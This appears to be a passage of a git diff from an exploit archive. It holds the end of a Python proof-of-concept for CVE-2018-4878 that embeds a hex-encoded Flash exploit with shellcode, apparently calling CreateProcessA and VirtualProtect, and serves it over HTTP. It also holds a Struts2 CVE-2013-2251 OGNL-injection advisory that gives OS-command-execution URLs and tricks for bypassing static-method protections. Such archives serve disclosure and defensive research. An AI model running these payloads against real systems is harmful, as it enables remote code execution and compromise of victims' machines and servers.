D0\x30\xF1\x12\xF0\x06\x5D\x2B\x10\x04\x00\x00\x1A\x1B\x00\x00\x5D\x13\x66\x13\x30\x5D\x13\x66\x13\x58\x00\x1D\x68\x2A\xF1\x12\x10\x05\x00\x00\xD7\x4A\x09\x0C\xD4\xF0\x04\x47\x00\x00\xBF\x14\xF8\x00\x00\x00\x01\x00\x00\x00\x6D\x78\x2F\x63\x6F\x72\x65\x2F\x6D\x78\x5F\x69\x6E\x74\x65\x72\x6E\x61\x6C\x00\x10\x00\x2E\x00\x00\x00\x00\x0A\x43\x45\x3A\x5C\x64\x65\x76\x5C\x34\x2E\x79\x5C\x66\x72\x61\x6D\x65\x77\x6F\x72\x6B\x73\x5C\x70\x72\x6F\x6A\x65\x63\x74\x73\x5C\x66\x72\x61\x6D\x65\x77\x6F\x72\x6B\x5C\x73\x72\x63\x3B\x6D\x78\x5C\x63\x6F\x72\x65\x3B\x6D\x78\x5F\x69\x6E\x74\x65\x72\x6E\x61\x6C\x2E\x61\x73\x00\x07\x6D\x78\x2E\x63\x6F\x72\x65\x0B\x6D\x78\x5F\x69\x6E\x74\x65\x72\x6E\x61\x6C\x2A\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x61\x64\x6F\x62\x65\x2E\x63\x6F\x6D\x2F\x32\x30\x30\x36\x2F\x66\x6C\x65\x78\x2F\x6D\x78\x2F\x69\x6E\x74\x65\x72\x6E\x61\x6C\x00\x06\x6E\x61\x6D\x65\x5F\x31\x06\x6E\x61\x6D\x65\x5F\x32\x06\x6E\x61\x6D\x65\x5F\x37\x04\x16\x03\x08\x05\x16\x06\x00\x05\x07\x01\x04\x07\x03\x07\x07\x03\x08\x07\x03\x09\x01\x00\x00\x02\x00\x00\x00\x01\x00\x01\x01\x06\x00\x00\x02\x08\x01\x00\x08\x01\x01\x02\x10\xD0\x10\x05\x00\x00\x40\x06\x41\x06\x03\x30\xF1\x01\xF0\x0C\x47\x00\x00\xBF\x14\x42\x0D\x00\x00\x01\x00\x00\x00\x67\x61\x64\x67\x65\x74\x00\x10\x00\x2E\x00\x05\x00\x80\x80\x80\x04\xFF\xFF\x03\x80\x80\x04\x00\x02\x00\x00\x00\x00\xE0\xFF\xEF\x41\x79\x06\x67\x61\x64\x67\x65\x74\x07\x50\x72\x69\x6D\x69\x74\x31\x02\x1E\x18\x00\x3B\x43\x3A\x5C\x55\x73\x65\x72\x73\x5C\x4D\x69\x68\x61\x5C\x41\x64\x6F\x62\x65\x4D\x69\x6E\x65\x50\x6F\x43\x5F\x74\x72\x79\x69\x6E\x67\x54\x6F\x45\x76\x61\x64\x65\x53\x65\x63\x53\x6F\x6C\x75\x74\x69\x6F\x6E\x73\x66\x6C\x61\x36\x2E\x61\x73\x06\x70\x61\x72\x61\x6D\x31\x04\x72\x65\x73\x74\x10\x67\x61\x64\x67\x65\x74\x2F\x66\x6C\x61\x73\x68\x31\x30\x30\x30\x04\x75\x69\x6E\x74\x09\x67\x61\x64\x67\x65\x74\x30\x24\x30\x07\x66\x6C\x61\x73\x68\x33\x32\x07\x66\x6C\x61\x73\x68\x33\x35\x07\x66\x6C\x61\x73\x68\x32\x31\x05\x45\x72\x72\x6F\x72\x08\x70\x6F\x73\x69\x74\x69\x6F\x6E\x0C\x72\x65\x61\x64\x55\x54\x46\x42\x79\x74\x65\x73\x0B\x74\x6F\x4C\x6F\x77\x65\x72\x43\x61\x73\x65\x21\x68\x74\x74\x70\x3A\x2F\x2F\x61\x64\x6F\x62\x65\x2E\x63\x6F\x6D\x2F\x41\x53\x33\x2F\x32\x30\x30\x36\x2F\x62\x75\x69\x6C\x74\x69\x6E\x01\x6B\x00\x01\x6E\x01\x65\x00\x00\x01\x6C\x07\x72\x65\x61\x64\x55\x54\x46\x01\x76\x00\x01\x75\x00\x01\x70\x00\x01\x74\x00\x01\x63\x01\x72\x00\x00\x00\x00\x01\x73\x00\x02\x62\x30\x01\x62\x06\x76\x61\x72\x5F\x31\x32\x04\x73\x69\x7A\x65\x03\x6F\x66\x74\x02\x66\x74\x07\x67\x61\x64\x67\x65\x74\x33\x03\x69\x6E\x74\x0E\x67\x61\x64\x67\x65\x74\x2F\x67\x61\x64\x67\x65\x74\x30\x06\x70\x61\x72\x61\x6D\x32\x06\x70\x61\x72\x61\x6D\x33\x07\x5F\x6C\x6F\x63\x31\x30\x5F\x06\x5F\x6C\x6F\x63\x34\x5F\x06\x5F\x6C\x6F\x63\x35\x5F\x06\x5F\x6C\x6F\x63\x36\x5F\x06\x5F\x6C\x6F\x63\x37\x5F\x06\x5F\x6C\x6F\x63\x38\x5F\x06\x5F\x6C\x6F\x63\x39\x5F\x07\x5F\x6C\x6F\x63\x31\x31\x5F\x07\x5F\x6C\x6F\x63\x31\x32\x5F\x09\x66\x6C\x61\x73\x68\x31\x30\x30\x30\x07\x66\x6C\x61\x73\x68\x37\x30\x06\x56\x65\x63\x74\x6F\x72\x0C\x67\x61\x64\x67\x65\x74\x2E\x61\x73\x24\x31\x35\x06\x50\x72\x69\x6D\x69\x74\x0B\x5F\x5F\x41\x53\x33\x5F\x5F\x2E\x76\x65\x63\x07\x66\x6C\x61\x73\x68\x33\x34\x07\x66\x6C\x61\x73\x68\x33\x36\x05\x41\x72\x72\x61\x79\x04\x63\x61\x6C\x6C\x05\x61\x70\x70\x6C\x79\x0E\x67\x61\x64\x67\x65\x74\x2F\x67\x61\x64\x67\x65\x74\x31\x09\x66\x6C\x61\x73\x68\x32\x30\x24\x31\x09\x75\x6E\x64\x65\x66\x69\x6E\x65\x64\x07\x4D\x61\x69\x6E\x45\x78\x70\x06\x64\x61\x74\x61\x31\x34\x0F\x72\x65\x61\x64\x55\x6E\x73\x69\x67\x6E\x65\x64\x49\x6E\x74\x04\x70\x75\x73\x68\x06\x6C\x65\x6E\x67\x74\x68\x08\x6D\x65\x74\x68\x6F\x64\x5F\x34\x08\x6D\x65\x74\x68\x6F\x64\x5F\x35\x09\x66\x6C\x61\x73\x68\x32\x30\x30\x33\x09\x66\x6C\x61\x73\x68\x32\x30\x30\x35\x07\x67\x61\x64\x67\x65\x74\x34\x07\x67\x61\x64\x67\x65\x74\x37\x07\x67\x61\x64\x67\x65\x74\x38\x07\x67\x61\x64\x67\x65\x74\x39\x03\x72\x65\x73\x09\x66\x6C\x61\x73\x68\x32\x30\x30\x34\x06\x53\x74\x72\x69\x6E\x67\x0E\x67\x61\x64\x67\x65\x74\x2F\x66\x6C\x61\x73\x68\x32\x30\x0D\x67\x61\x64\x67\x65\x74\x2F\x67\x61\x64\x67\x65\x74\x17\x5F\x5F\x67\x6F\x5F\x74\x6F\x5F\x64\x65\x66\x69\x6E\x69\x74\x69\x6F\x6E\x5F\x68\x65\x6C\x70\x03\x70\x6F\x73\x03\x31\x34\x35\x03\x31\x37\x37\x03\x32\x39\x32\x03\x33\x38\x32\x04\x33\x32\x31\x32\x07\x66\x6C\x61\x73\x68\x32\x30\x04\x34\x34\x31\x34\x06\x4F\x62\x6A\x65\x63\x74\x1C\x5F\x5F\x67\x6F\x5F\x74\x6F\x5F\x63\x74\x6F\x72\x5F\x64\x65\x66\x69\x6E\x69\x74\x69\x6F\x6E\x5F\x68\x65\x6C\x70\x03\x32\x31\x35\x02\x39\x33\x00\x06\x6E\x61\x6D\x65\x5F\x31\x06\x6E\x61\x6D\x65\x5F\x32\x06\x6E\x61\x6D\x65\x5F\x37\x02\x63\x72\x02\x6E\x65\x0C\x6B\x65\x72\x6E\x65\x6C\x33\x32\x2E\x64\x6C\x6C\x0E\x76\x69\x72\x74\x75\x61\x6C\x70\x72\x6F\x74\x65\x63\x74\x0E\x63\x72\x65\x61\x74\x65\x70\x72\x6F\x63\x65\x73\x73\x61\x08\x6D\x65\x74\x68\x6F\x64\x5F\x32\x08\x6D\x65\x74\x68\x6F\x64\x5F\x32\x11\x43\x72\x65\x61\x74\x65\x50\x72\x6F\x63\x65\x73\x73\x46\x75\x6E\x63\x08\x66\x69\x6E\x64\x66\x75\x6E\x63\x3A\x05\x01\x16\x04\x17\x04\x08\x12\x05\x42\x18\x01\x1A\x01\x1A\x43\x16\x44\x16\x6C\x16\x6C\x17\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x06\x09\x01\x02\x03\x04\x05\x06\x07\x08\x09\x08\x01\x02\x03\x04\x05\x06\x07\x08\x01\x03\x09\x01\x0A\x0C\x04\x05\x06\x07\x08\x09\x08\x01\x0A\x0C\x04\x05\x06\x07\x08\x67\x07\x02\x09\x07\x03\x0B\x07\x03\x0C\x07\x03\x0D\x07\x02\x0E\x07\x03\x75\x07\x02\x0F\x07\x02\x10\x07\x04\x11\x07\x02\x1A\x07\x03\x02\x07\x02\x16\x07\x03\x2B\x07\x03\x2C\x07\x03\x2D\x07\x03\x2E\x07\x03\x2F\x07\x03\x30\x07\x03\x31\x07\x03\x23\x07\x02\x32\x07\x03\x3F\x07\x02\x40\x09\x41\x01\x07\x09\x41\x1D\x19\x01\x01\x1B\x02\x07\x03\x45\x07\x03\x46\x07\x02\x47\x07\x04\x48\x07\x04\x49\x07\x02\x4C\x07\x02\x4D\x07\x02\x4E\x07\x02\x4F\x07\x04\x50\x07\x02\x51\x07\x03\x52\x07\x03\x53\x07\x03\x54\x07\x03\x29\x07\x03\x55\x07\x03\x56\x07\x03\x57\x07\x03\x58\x07\x03\x59\x07\x03\x5A\x07\x03\x5B\x07\x02\x5C\x07\x03\x66\x07\x03\x01\x07\x02\x43\x09\x01\x03\x07\x02\x68\x07\x0A\x6D\x07\x0A\x6E\x07\x0A\x6F\x07\x0C\x66\x07\x0A\x0E\x07\x0A\x16\x07\x0A\x47\x07\x0A\x4C\x07\x0A\x09\x1D\x19\x01\x40\x07\x0A\x4D\x07\x0A\x4E\x07\x0A\x0F\x07\x0A\x4F\x07\x0A\x51\x09\x41\x04\x1D\x19\x01\x40\x07\x0C\x46\x07\x0C\x52\x07\x0C\x53\x07\x0C\x0C\x07\x0C\x3F\x07\x0C\x0B\x07\x0C\x45\x07\x0C\x02\x07\x0A\x40\x1D\x19\x01\x40\x1B\x05\x07\x0A\x1A\x1D\x19\x01\x40\x1D\x19\x01\x40\x07\x0C\x0D\x07\x0C\x76\x07\x0A\x10\x1D\x19\x01\x40\x1D\x19\x01\x40\x1D\x19\x01\x40\x1D\x19\x01\x40\x1D\x19\x01\x40\x07\x0C\x77\x1D\x19\x01\x40\x1D\x19\x01\x40\x1D\x19\x01\x40\x1D\x19\x01\x40\x07\x0C\x78\x1D\x19\x01\x40\x1D\x19\x01\x40\x07\x00\x00\x04\x00\x01\x00\x40\x08\x8C\x01\x01\x03\x06\x00\x40\x33\x02\x03\x00\x40\x40\x40\x4A\x80\x06\x34\x35\x00\x00\x5D\x02\x00\x00\x5E\x00\x00\x00\x04\x00\x08\x5F\x01\x60\x61\x5F\x01\x60\x62\x5F\x01\x60\x63\x5F\x01\x60\x64\x5F\x01\x60\x65\x5F\x01\x60\x67\x69\x01\x60\x6A\x5F\x01\x60\x6B\x01\x34\x35\x09\x06\x00\x05\x00\x00\x06\x5F\x40\x01\x40\x00\x01\x00\x06\x40\x02\x01\x00\x01\x01\x4D\x51\x03\x01\x01\x02\x64\x51\x04\x02\x01\x03\x4B\x51\x05\x03\x01\x04\x3B\x51\x06\x04\x01\x05\x01\x06\x01\x34\x44\x00\x00\x02\x06\x07\x07\x00\x08\x01\x04\x05\x0D\xD0\x30\xEF\x01\x02\x00\x09\xEF\x01\x03\x01\x0A\x47\x00\x00\x01\x08\x03\x04\x05\x01\x47\x00\x00\x02\x0C\x03\x05\x0A\xA4\x06\xD0\x30\x57\x2A\xD5\x30\x65\x01\x24\x00\x74\x6D\x01\x65\x01\x24\x00\x74\x6D\x02\xF0\x19\x65\x01\x24\x00\x74\x6D\x03\x65\x01\x24\x00\x74\x6D\x04\xF0\x1B\x65\x01\x24\x00\x74\x6D\x05\xF0\x1C\x65\x01\x24\x00\x74\x6D\x06\x65\x01\x24\x00\x74\x6D\x07\xF0\x1E\x65\x01\x24\x00\x73\x6D\x08\x65\x01\x5D\x4E\x5D\x4C\x5D\x57\x66\x57\x46\x4C\x01\x46\x4E\x01\x2F\x01\xA8\x74\x6D\x01\x65\x01\x65\x01\x6C\x01\x2D\x02\xA1\x74\x6D\x02\x10\x3B\x00\x00\x09\xF0\x26\x5D\x4E\x65\x01\x6C\x02\x46\x4E\x01\x2D\x03\xA8\x25\xCD\xB4\x01\x14\x0D\x00\x00\xF0\x28\x65\x01\x24\x00\x74\x6D\x01\x10\x22\x00\x00\x65\x01\x6C\x03\x91\x74\x65\x01\x2B\x6D\x03\x65\x01\x65\x01\x6C\x02\x2D\x04\xA1\x74\x6D\x02\x65\x01\x6C\x03\x25\x80\x04\x15\xBA\xFF\xFF\x65\x01\x6C\x01\x76\x11\x04\x00\x00\x10\x0A\x00\x00\xF0\x30\x5D\x3C\x2C\x6C\x4A\x3C\x01\x03\xF0\x32\x5E\x58\x65\x01\x6C\x02\x61\x58\xF0\x33\x65\x01\x65\x01\x6C\x02\x5D\x4E\x65\x01\x6C\x02\x24\x3C\xA0\x46\x4E\x01\xA0\x74\x6D\x01\x5D\x4E\x65\x01\x6C\x01\x46\x4E\x01\x25\xD0\x8A\x01\x14\x04\x00\x00\x10\x0A\x00\x00\xF0\x36\x5D\x3C\x2C\x6C\x4A\x3C\x01\x03\x65\x01\x5D\x4E\x65\x01\x6C\x01\x25\x84\x01\xA0\x46\x4E\x01\x74\x6D\x04\xF0\x39\x65\x01\x65\x01\x6C\x02\x5D\x4E\x65\x01\x6C\x01\x25\x80\x01\xA0\x46\x4E\x01\xA0\x74\x6D\x01\x65\x01\x24\x03\x24\x04\xA2\x74\x6D\x03\x10\x70\x00\x00\x09\x5D\x57\x66\x57\x65\x01\x6C\x02\x5D\x4E\x65\x01\x6C\x01\x65\x01\x6C\x03\xA0\x46\x4E\x01\xA0\x61\x44\x5D\x57\x66\x57\x24\x0C\x46\x59\x01\x46\x09\x00\x2C\x72\x14\x35\x00\x00\x65\x01\x5D\x4E\x65\x01\x6C\x01\x65\x01\x6C\x03\xA0\x24\x03\x24\x04\xA2\xA1\x46\x4E\x01\x74\x6D\x05\x65\x01\x5D\x4E\x65\x01\x6C\x01\x65\x01\x6C\x03\xA0\x24\x04\xA0\x46\x4E\x01\x74\x6D\x06\xF0\x42\x10\x1B\x00\x00\x65\x01\x65\x01\x6C\x03\x24\x05\x24\x04\xA2\xA0\x74\x6D\x03\x65\x01\x6C\x03\x65\x01\x6C\x04\x15\x84\xFF\xFF\x65\x01\x6C\x05\x24\x00\xAB\x76\x2A\x76\x11\x09\x00\x00\x29\x65\x01\x6C\x06\x24\x00\xAB\x76\x11\x04\x00\x00\x10\x0A\x00\x00\xF0\x48\x5D\x3C\x2C\x6C\x4A\x3C\x01\x03\xF0\x4A\x65\x01\x65\x01\x6C\x05\x65\x01\x6C\x02\xA0\x74\x6D\x05\xF0\x4B\x65\x01\x24\x00\x74\x6D\x03\x10\xE9\x00\x00\x09\xF0\x4E\x65\x01\x5D\x4E\x65\x01\x6C\x05\x46\x4E\x01\x74\x6D\x01\x65\x01\x6C\x01\x24\x00\x14\x0A\x00\x00\xF0\x51\x5D\x3C\x2C\x6C\x4A\x3C\x01\x03\x5D\x57\x66\x57\x65\x01\x6C\x02\x65\x01\x6C\x01\xA0\x61\x44\x5D\x57\x66\x57\x46\x54\x00\x46\x09\x00\x2C\x73\x14\x38\x00\x00\xF0\x56\x65\x01\x5D\x4E\x65\x01\x6C\x02\x65\x01\x6C\x06\xA0\x65\x01\x6C\x03\x24\x04\xA2\xA0\x46\x4E\x01\x74\x6D\x07\xF0\x57\x65\x01\x6C\x08\xC0\x73\x65\x01\x2B\x6D\x08\x65\x01\x6C\x08\x24\x01\x0E\x58\x00\x00\x10\x7E\x00\x00\x5D\x57\x66\x57\x65\x01\x6C\x02\x65\x01\x6C\x01\xA0\x61\x44\x5D\x57\x66\x57\x46\x54\x00\x46\x09\x00\x2C\x74\x13\x04\x00\x00\x10\x31\x00\x00\x5E\x5F\x5D\x4E\x65\x01\x6C\x02\x65\x01\x6C\x06\xA0\x65\x01\x6C\x03\x24\x04\xA2\xA0\x46\x4E\x01\x61\x5F\xF0\x63\x65\x01\x6C\x08\xC0\x73\x65\x01\x2B\x6D\x08\x65\x01\x6C\x08\x24\x01\x17\x2A\x00\x00\x65\x01\x6C\x03\x91\x74\x65\x01\x2B\x6D\x03\xF0\x6B\x65\x01\x65\x01\x6C\x05\x24\x04\xA0\x74\x6D\x05\xF0\x4C\x65\x01\x6C\x03\x25\x80\x02\x0C\x04\x00\x00\x10\x06\xFF\xFF\x65\x01\x6C\x07\x48\xF0\x6F\x10\x17\x00\x00\xD0\x30\xD1\x30\x5A\x00\x2A\xD6\x2A\x30\x2B\x6D\x01\xF0\x71\x5D\x3C\x2C\x6C\x4A\x3C\x01\x03\x24\x00\x48\x01\x46\x84\x06\x8A\x06\x3C\x3D\x08\x0D\x00\x01\x01\x00\x0E\x00\x02\x01\x00\x0F\x00\x03\x01\x00\x10\x00\x04\x01\x00\x11\x00\x05\x01\x00\x12\x00\x06\x01\x00\x13\x00\x07\x01\x00\x14\x00\x08\x15\x00\x03\x0D\x0D\x04\x05\x86\x03\xD0\x30\x24\x00\x74\x63\x04\x5D\x4D\x46\x4D\x00\x29\x5D\x4C\x5D\x4D\x66\x4D\x46\x4C\x01\x74\x63\x05\xF0\x7C\x5D\x4E\x5D\x4E\x5D\x4E\x62\x05\x24\x08\xA0\x46\x4E\x01\x24\x14\xA0\x46\x4E\x01\x24\x04\xA0\x46\x4E\x01\x5D\x51\x66\x51\x96\x96\x12\x08\x00\x00\x25\xBC\x01\x82\x10\x04\x00\x00\x25\xB0\x01\x82\xA0\x74\x63\x06\xF0\x7D\x5D\x4E\x62\x06\x46\x4E\x01\x2D\x04\x15\x04\x00\x00\x10\x0A\x00\x00\xF0\x7F\x62\x06\x24\x04\xA0\x74\x63\x06\xF0\x81\x01\x5D\x4E\x62\x06\x46\x4E\x01\x74\x63\x06\xF0\x82\x01\x5D\x4E\x62\x06\x46\x4E\x01\x74\x63\x07\xF0\x83\x01\x5D\x4E\x62\x05\x24\x1C\xA0\x46\x4E\x01\x74\x63\x08\xF0\x84\x01\x5D\x4E\x62\x05\x24\x20\xA0\x46\x4E\x01\x74\x63\x09\xF0\x85\x01\x5D\x47\x66\x47\x5D\x40\x66\x40\x53\x01\x25\x80\x02\x42\x01\x80\x5A\x63\x0A\x10\x24\x00\x00\x09\xF0\x88\x01\x62\x0A\x62\x04\x5D\x4E\x62\x07\x25\x80\x01\xA1\x62\x04\x24\x04\xA2\xA0\x46\x4E\x01\x61\x53\xF0\x89\x01\x62\x04\x91\x74\x63\x04\xF0\x86\x01\x62\x04\x25\x80\x02\x0C\x04\x00\x00\x10\xCC\xFF\xFF\xF0\x8B\x01\x62\x0A\x24\x20\x24\x07\xA0\xD1\x61\x53\xF0\x8C\x01\x5D\x4F\x62\x05\x24\x1C\xA0\xD2\x46\x4F\x02\x29\xF0\x8D\x01\x5D\x4F\x62\x05\x24\x20\xA0\xD3\x46\x4F\x02\x29\xF0\x8E\x01\x5D\x4F\x62\x06\x5D\x49\x62\x0A\x46\x49\x01\x25\x80\x01\xA0\x46\x4F\x02\x29\xF0\x8F\x01\x5D\x3E\x24\x41\x4A\x3E\x01\x80\x3E\x63\x0B\xF0\x90\x01\x5D\x4D\x66\x4D\x66\x1F\x20\x62\x0B\x46\x20\x02\x82\x63\x0C\xF0\x91\x01\x5D\x4F\x62\x06\x62\x07\x46\x4F\x02\x29\xF0\x92\x01\x5D\x4F\x62\x05\x24\x1C\xA0\x62\x08\x46\x4F\x02\x29\xF0\x93\x01\x5D\x4F\x62\x05\x24\x20\xA0\x62\x09\x46\x4F\x02\x29\xF0\x94\x01\x47\x00\x00\x04\x0C\x03\x05\x0A\x92\x03\xD0\x30\x57\x2A\xD5\x30\x65\x01\x24\x00\x6D\x02\xF0\x98\x01\x65\x01\x20\x80\x3E\x6D\x01\xF0\x99\x01\x65\x01\x20\x80\x65\x6D\x03\xF0\x9F\x01\x65\x01\x5D\x3F\x66\x3F\x82\x6D\x08\xF0\xA0\x01\x65\x01\x20\x85\x6D\x09\xF0\xA4\x01\xF0\xA4\x01\x65\x01\x56\x00\x80\x3E\x6D\x01\xF0\xA5\x01\x5D\x42\x66\x42\x66\x43\x24\x00\x61\x44\xF0\xA6\x01\x65\x01\x24\x00\x73\x6D\x02\x10\x24\x00\x00\x09\xF0\xA7\x01\x65\x01\x6C\x01\x5D\x42\x66\x42\x66\x43\x46\x45\x00\x46\x25\x01\x29\xF0\xA6\x01\x65\x01\x65\x01\x6C\x02\x24\x04\xA0\x73\x6D\x02\x65\x01\x6C\x02\x5D\x42\x66\x42\x66\x43\x66\x46\x15\xCC\xFF\xFF\xF0\xA8\x01\x65\x01\x5D\x47\x66\x47\x5D\x40\x66\x40\x53\x01\x64\x65\x01\x6C\x01\x41\x01\x80\x66\x6D\x03\xF0\xAA\x01\x65\x01\x5D\x49\x65\x01\x6C\x03\x46\x49\x01\x74\x6D\x04\xF0\xAC\x01\x65\x01\x5D\x64\x46\x64\x00\x74\x6D\x05\xF0\xAD\x01\x65\x01\x6C\x05\x24\x00\x13\x04\x00\x00\x10\x0B\x00\x00\xF0\xAF\x01\x5D\x3C\x2C\x6C\x4A\x3C\x01\x03\x5D\x4B\x65\x01\x6C\x05\x65\x01\x6C\x04\x65\x01\x6C\x03\x66\x46\x24\x04\xA2\x46\x4B\x03\x29\x65\x01\x5D\x4C\x5D\x4D\x66\x4D\x46\x4C\x01\x74\x6D\x06\xF0\xB4\x01\x65\x01\x5D\x4E\x5D\x4E\x65\x01\x6C\x06\x24\x1C\xA0\x46\x4E\x01\x24\x08\xA0\x46\x4E\x01\x24\x04\xA0\x74\x6D\x06\xF0\xB5\x01\x65\x01\x5D\x4E\x65\x01\x6C\x06\x46\x4E\x01\x74\x6D\x07\xF0\xB6\x01\x5D\x4F\x65\x01\x6C\x06\x65\x01\x6C\x04\x46\x4F\x02\x29\xF0\xB8\x01\x65\x01\x5D\x4D\x66\x4D\x20\x5D\x5F\x66\x5F\x46\x1F\x02\x82\x6D\x08\xF0\xBA\x01\x5D\x4F\x65\x01\x6C\x06\x65\x01\x6C\x07\x46\x4F\x02\x29\x47\x10\x18\x00\x00\xD0\x30\xD1\x30\x5A\x00\x2A\xD6\x2A\x30\x2B\x6D\x01\xF0\xBF\x01\x5D\x3C\x2C\x6C\x4A\x3C\x01\x03\xF0\xC2\x01\x47\x01\x35\xF2\x02\xF6\x02\x3C\x3D\x09\x29\x00\x01\x1E\x00\x2A\x00\x02\x15\x00\x2B\x00\x03\x1A\x00\x2C\x00\x04\x01\x00\x2D\x00\x05\x01\x00\x2E\x00\x06\x01\x00\x2F\x00\x07\x01\x00\x30\x00\x08\x00\x00\x31\x00\x09\x32\x00\x05\x08\x01\x05\x06\x0E\xF1\x05\xF0\x0C\xD0\x30\xF0\x0E\xD0\x49\x00\xF0\x0F\x47\x00\x00\x06\x09\x01\x01\x04\x3D\xD0\x30\x10\x05\x00\x00\x41\x05\x03\x58\x04\xF1\x05\xF0\x07\x5D\x36\x5D\x37\x66\x37\x10\x04\x00\x00\x16\x1F\x00\x00\x30\x5D\x35\x66\x35\x30\x5D\x35\x66\x35\x58\x00\x1D\x26\x11\x06\x00\x00\x47\x70\x45\x0A\x10\xD5\x1D\x68\x34\xF1\x05\xF0\x05\x47\x00\x00\x1C\x13\x02\x00\x02\x00\x73\x68\x65\x6C\x6C\x63\x6F\x64\x42\x79\x74\x65\x73\x00\x00\x00\x4D\x61\x69\x6E\x45\x78\x70\x00\x40\x00\x00\x00" + + +print "[+] CVE-2018-4878 poc " +print "[x] files created" + +swf = "%s.swf" % flash_name + +html = """ + + + +""" + "" + """ + +""" + +f = open("%s" % swf, "wb") +f.write(data) +f.close() + +f = open("index.html", "wb") +f.write(html) +f.close() + + +HandlerClass = SimpleHTTPRequestHandler +ServerClass = BaseHTTPServer.HTTPServer +Protocol = "HTTP/1.0" + + +port = 8080 +server_address = ('0.0.0.0', port) + +HandlerClass.protocol_version = Protocol +httpd = ServerClass(server_address, HandlerClass) + +sa = httpd.socket.getsockname() +print "Server ready", sa[0], "port", sa[1], "..." +httpd.serve_forever() \ No newline at end of file diff --git a/exploits/multiple/webapps/44583.txt b/exploits/multiple/webapps/44583.txt new file mode 100644 index 000000000..967940eec --- /dev/null +++ b/exploits/multiple/webapps/44583.txt @@ -0,0 +1,164 @@ +CVE Number: CVE-2013-2251 +Title: Struts2 Prefixed Parameters OGNL Injection Vulnerability +Affected Software: Apache Struts v2.0.0 - 2.3.15 +Credit: Takeshi Terada of Mitsui Bussan Secure Directions, Inc. +Issue Status: v2.3.15.1 was released which fixes this vulnerability +Issue ID by Vender: S2-016 + +Overview: + Struts2 is an open-source web application framework for Java. + Struts2 (v2.0.0 - 2.3.15) is vulnerable to remote OGNL injection which + leads to arbitrary Java method execution on the target server. This is + caused by insecure handling of prefixed special parameters (action:, + redirect: and redirectAction:) in DefaultActionMapper class of Struts2. + +Details: + + + Struts2's ActionMapper is a mechanism for mapping between incoming HTTP + request and action to be executed on the server. DefaultActionMapper is + a default implementation of ActionMapper. It handles four types of + prefixed parameters: action:, redirect:, redirectAction: and method:. + + For example, redirect prefix is used for HTTP redirect. + + Normal redirect prefix usage in JSP: + + ... + + + + + If the cancel button is clicked, redirection is performed. + + Request URI for redirection: + /foo.action?redirect:http://www.google.com/ + + Resopnse Header: + HTTP/1.1 302 Found + Location: http://www.google.com/ + + Usage of other prefixed parameters is similar to redirect. + See Struts2 document for details. + https://cwiki.apache.org/confluence/display/WW/ActionMapper + + + + As stated already, there are four types of prefixed parameters. + + action:, redirect:, redirectAction:, method: + + All except for method: can be used for attacks. But regarding action:, + it can be used only if wildcard mapping is enabled in configuration. + On the one hand, redirect: and redirectAction: are not constrained by + configuration (thus they are convenient for attackers). + + One thing that should be noted is that prefixed parameters are quite + forceful. It means that behavior of application which is not intended + to accept prefixed parameters can also be overwritten by prefixed + parameters added to HTTP request. Therefore all Struts2 applications + that use DefaultActionMapper are vulnerable to the attack. + + The injection point is name of prefixed parameters. + Example of attack using redirect: is shown below. + + Attack URI: + /bar.action?redirect:http://www.google.com/%25{1000-1} + + Response Header: + HTTP/1.1 302 Found + Location: http://www.google.com/999 + + As you can see, expression (1000-1) is evaluated and the result (999) + is appeared in Location response header. As I shall explain later, + more complex attacks such as OS command execution is possible too. + + In DefaultActionMapper, name of prefixed parameter is once stored as + ActionMapping object and is later executed as OGNL expression. + Rough method call flow in execution phase is as the following. + + org.apache.struts2.dispatcher.ng.filter.StrutsExecuteFilter.doFilter() + org.apache.struts2.dispatcher.ng.ExecuteOperations.executeAction() + org.apache.struts2.dispatcher.Dispatcher.serviceAction() + org.apache.struts2.dispatcher.StrutsResultSupport.execute() + org.apache.struts2.dispatcher.StrutsResultSupport.conditionalParse() + com.opensymphony.xwork2.util.TextParseUtil.translateVariables() + com.opensymphony.xwork2.util.OgnlTextParser.evaluate() + +Proof of Concept: + + + PoC is already disclosed on vender's web page. + https://struts.apache.org/release/2.3.x/docs/s2-016.html + + Below PoC URLs are just quotes from the vender's page. + + Simple Expression: + http://host/struts2-blank/example/X.action?action:%25{3*4} + http://host/struts2-showcase/employee/save.action?redirect:%25{3*4} + + OS Command Execution: + http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()} + http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()} + http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()} + + Obviously such attacks are not specific to blank/showcase application, + but all Struts2 based applications may be subject to attacks. + + + + Another topic that I think worth mentioning is that PoC URLs use + ProcessBuilder class to execute OS commands. The merit of using this + class is that it does not require static method to execute OS commands, + while Runtime class does require it. + + As you may know, static method call in OGNL is basically prohibited. + But in Struts2 <= v2.3.14.1 this restriction was easily bypassed by + a simple trick: + + %{#_memberAccess['allowStaticMethodAccess']=true, + @java.lang.Runtime@getRuntime().exec('your commands')} + + In Struts v2.3.14.2, SecurityMemberAccess class has been changed to + prevent the trick. However there are still some techniques to call + static method in OGNL. + + One technique is to use reflection to replace static method call to + instance method call. Another technique is to overwrite #_memberAccess + object itself rather than property of the object: + + %{#_memberAccess=new com.opensymphony.xwork2.ognl.SecurityMemberAccess(true), + @java.lang.Runtime@getRuntime().exec('your commands')} + + Probably prevention against static method is just an additional layer + of defense, but I think that global objects such as #_memberAccess + should be protected from rogue update. + +Timeline: + 2013/06/24 Reported to Struts Security ML + 2013/07/17 Vender announced v2.3.15.1 + 2013/08/10 Disclosure of this advisory + +Recommendation: + Immediate upgrade to the latest version is strongly recommended as + active attacks have already been observed. It should be noted that + redirect: and redirectAction: parameters were completely dropped and + do not work in the latest version as stated in the vender's page. + Thus attention for compatibility issues is required for upgrade. + + If you cannot upgrade your Struts2 